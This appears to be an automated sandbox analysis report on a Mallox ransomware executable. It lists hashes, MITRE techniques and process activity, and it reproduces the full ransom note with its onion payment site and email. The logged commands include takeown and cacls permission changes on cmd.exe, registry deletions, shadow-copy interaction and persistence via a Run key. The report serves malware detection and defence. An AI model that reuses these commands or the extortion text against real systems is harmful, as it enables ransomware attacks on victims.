193d2c92560adcc08eaf3157673b1f835ae85c5c74679cac587e753f67b33dcf

General

Target

a-Skjkmfvbkv.bin.exe
Size

12KB
MD5

8383ef681ba9f25dd7bf49c28cef559e
SHA1

12ddeb7c5e504dfbbf194842feb86662c170a8f1
SHA256

193d2c92560adcc08eaf3157673b1f835ae85c5c74679cac587e753f67b33dcf
SHA512

6ef606af88c235f21868f3e9d8ade4e3eb76308559f54ee2501b6302031bc635d68edd0a23de65a7e7590264827fdff1a4ac7e95d5327bc10fb4839397380af4
SSDEEP

384:pUR3OFfFLM89kDKyfjDWwYWxptYcFmVc03K:OOFhv9k28ttYcFmVc6K

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\FILE RECOVERY.txt

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: BDB6543C183BBABD9663DEFA 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.�

Emails

mallox.resurrection@onionmail.org

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Modifies file permissions 1 TTPs 18 IoCs

discovery

File Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
1552	takeown.exe
1688	takeown.exe
1856	takeown.exe
1932	takeown.exe
1748	takeown.exe
1992	takeown.exe
1572	takeown.exe
1920	takeown.exe
1272	takeown.exe
1944	takeown.exe
1932	takeown.exe
1304	takeown.exe
2024	takeown.exe
920	takeown.exe
560	takeown.exe
520	takeown.exe
1548	takeown.exe
1404	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

a-Skjkmfvbkv.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zitfq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Egosmitqdu\\Zitfq.exe\""	a-Skjkmfvbkv.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

a-Skjkmfvbkv.bin.exe

description	ioc	process
File opened (read-only)	\??\G:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\K:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\U:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\Y:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\F:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\H:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\N:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\O:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\T:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\Z:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\B:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\L:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\M:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\R:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\S:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\V:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\W:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\J:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\E:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\I:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\P:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\Q:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\X:	a-Skjkmfvbkv.bin.exe
File opened (read-only)	\??\A:	a-Skjkmfvbkv.bin.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

a-Skjkmfvbkv.bin.exe

description pid process target process

PID 576 set thread context of 1768 576 a-Skjkmfvbkv.bin.exe a-Skjkmfvbkv.bin.exe

flow	ioc
9	api.ipify.org

description	pid	process	target process
PID 576 set thread context of 1768	576	a-Skjkmfvbkv.bin.exe	a-Skjkmfvbkv.bin.exe

Drops file in Program Files directory 64 IoCs

Processes:

a-Skjkmfvbkv.bin.exe

description	ioc	process
File created	C:\Program Files\Java\jdk1.7.0_80\bin\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\fr-FR\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\7-Zip\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\de-DE\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\it-IT\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\dropins\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\en-US\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\es-ES\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\FILE RECOVERY.txt	a-Skjkmfvbkv.bin.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
568	sc.exe
1512	sc.exe
1628	sc.exe
1548	sc.exe
1612	sc.exe
1568	sc.exe
700	sc.exe
1796	sc.exe
1552	sc.exe
1288	sc.exe
296	sc.exe
636	sc.exe
1540	sc.exe
1204	sc.exe
1128	sc.exe
700	sc.exe
1836	sc.exe
1344	sc.exe
636	sc.exe
996	sc.exe
1952	sc.exe
1344	sc.exe
1088	sc.exe
1952	sc.exe
976	sc.exe
1628	sc.exe
692	sc.exe
320	sc.exe
268	sc.exe
1460	sc.exe
576	sc.exe
608	sc.exe
1980	sc.exe
2032	sc.exe
1188	sc.exe
1536	sc.exe
2032	sc.exe
1924	sc.exe
1404	sc.exe
640	sc.exe
576	sc.exe
1188	sc.exe
1088	sc.exe
700	sc.exe
1576	sc.exe
608	sc.exe
1924	sc.exe
1816	sc.exe
588	sc.exe
580	sc.exe
920	sc.exe
1628	sc.exe
564	sc.exe
580	sc.exe
960	sc.exe
1116	sc.exe
1536	sc.exe
920	sc.exe
560	sc.exe
608	sc.exe
692	sc.exe
1492	sc.exe
1560	sc.exe
1932	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1200 vssadmin.exe

pid	process
1200	vssadmin.exe

Kills process with taskkill 26 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
872	taskkill.exe
1796	taskkill.exe
636	taskkill.exe
872	taskkill.exe
1796	taskkill.exe
1540	taskkill.exe
640	taskkill.exe
1568	taskkill.exe
1572	taskkill.exe
520	taskkill.exe
1792	taskkill.exe
636	taskkill.exe
1512	taskkill.exe
1540	taskkill.exe
1512	taskkill.exe
1408	taskkill.exe
636	taskkill.exe
2036	taskkill.exe
1532	taskkill.exe
2040	taskkill.exe
636	taskkill.exe
1628	taskkill.exe
1572	taskkill.exe
2040	taskkill.exe
976	taskkill.exe
1272	taskkill.exe

Runs net.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exea-Skjkmfvbkv.bin.exe

pid process

320 powershell.exe
1768 a-Skjkmfvbkv.bin.exe

pid	process
320	powershell.exe
1768	a-Skjkmfvbkv.bin.exe

Suspicious use of AdjustPrivilegeToken 41 IoCs

Processes:

powershell.exea-Skjkmfvbkv.bin.exetakeown.exea-Skjkmfvbkv.bin.exevssvc.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	320	powershell.exe
Token: SeDebugPrivilege	576	a-Skjkmfvbkv.bin.exe
Token: SeTakeOwnershipPrivilege	1992	takeown.exe
Token: SeTakeOwnershipPrivilege	1768	a-Skjkmfvbkv.bin.exe
Token: SeDebugPrivilege	1768	a-Skjkmfvbkv.bin.exe
Token: SeBackupPrivilege	952	vssvc.exe
Token: SeRestorePrivilege	952	vssvc.exe
Token: SeAuditPrivilege	952	vssvc.exe
Token: SeTakeOwnershipPrivilege	1404	takeown.exe
Token: SeTakeOwnershipPrivilege	1552	takeown.exe
Token: SeTakeOwnershipPrivilege	2024	takeown.exe
Token: SeTakeOwnershipPrivilege	920	takeown.exe
Token: SeTakeOwnershipPrivilege	1688	takeown.exe
Token: SeTakeOwnershipPrivilege	1572	takeown.exe
Token: SeTakeOwnershipPrivilege	1548	takeown.exe
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	1532	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	2040	taskkill.exe
Token: SeDebugPrivilege	1540	taskkill.exe
Token: SeDebugPrivilege	1408	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	976	taskkill.exe
Token: SeDebugPrivilege	640	taskkill.exe
Token: SeDebugPrivilege	1568	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1628	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	636	taskkill.exe
Token: SeDebugPrivilege	2036	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a-Skjkmfvbkv.bin.execmd.exe

description	pid	process	target process
PID 576 wrote to memory of 320	576	a-Skjkmfvbkv.bin.exe	powershell.exe
PID 576 wrote to memory of 320	576	a-Skjkmfvbkv.bin.exe	powershell.exe
PID 576 wrote to memory of 320	576	a-Skjkmfvbkv.bin.exe	powershell.exe
PID 576 wrote to memory of 320	576	a-Skjkmfvbkv.bin.exe	powershell.exe
PID 576 wrote to memory of 1080	576	a-Skjkmfvbkv.bin.exe	cmd.exe
PID 576 wrote to memory of 1080	576	a-Skjkmfvbkv.bin.exe	cmd.exe
PID 576 wrote to memory of 1080	576	a-Skjkmfvbkv.bin.exe	cmd.exe
PID 576 wrote to memory of 1080	576	a-Skjkmfvbkv.bin.exe	cmd.exe
PID 1080 wrote to memory of 1568	1080	cmd.exe	reg.exe
PID 1080 wrote to memory of 1568	1080	cmd.exe	reg.exe
PID 1080 wrote to memory of 1568	1080	cmd.exe	reg.exe
PID 1080 wrote to memory of 1568	1080	cmd.exe	reg.exe
PID 1080 wrote to memory of 1992	1080	cmd.exe	takeown.exe
PID 1080 wrote to memory of 1992	1080	cmd.exe	takeown.exe
PID 1080 wrote to memory of 1992	1080	cmd.exe	takeown.exe
PID 1080 wrote to memory of 1992	1080	cmd.exe	takeown.exe
PID 1080 wrote to memory of 1164	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1164	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1164	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1164	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 844	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 844	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 844	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 844	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1124	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1124	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1124	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1124	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1924	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1924	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1924	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1924	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 852	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 852	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 852	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 852	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 2012	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 2012	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 2012	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 2012	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 932	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 932	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 932	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 932	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1616	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1616	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1616	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1616	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1016	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1016	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1016	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1016	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1980	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1980	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1980	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1980	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1632	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1632	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1632	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1632	1080	cmd.exe	cmd.exe
PID 1080 wrote to memory of 1636	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1636	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1636	1080	cmd.exe	cacls.exe
PID 1080 wrote to memory of 1636	1080	cmd.exe	cacls.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

Processes:

a-Skjkmfvbkv.bin.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	a-Skjkmfvbkv.bin.exe

C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe
"C:\Users\Admin\AppData\Local\Temp\a-Skjkmfvbkv.bin.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-Date
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:320

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\Ksifbwxmmfbgnkill$-arab.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1080

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
3⤵
PID:1568

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\cmd.exe /a
3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1164

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /g Administrators:f
3⤵
PID:844

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1124

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Users:r
3⤵
PID:1924

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:852

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
3⤵
PID:2012

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:932

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d SERVICE
3⤵
PID:1616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1016

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
3⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1632

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d "network service"
3⤵
PID:1636

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1132

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /g system:r
3⤵
PID:1540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1004

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
3⤵
PID:480

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\cmd.exe /a
3⤵
- Modifies file permissions
PID:1304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1780

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
3⤵
PID:108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1800

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
3⤵
PID:1812

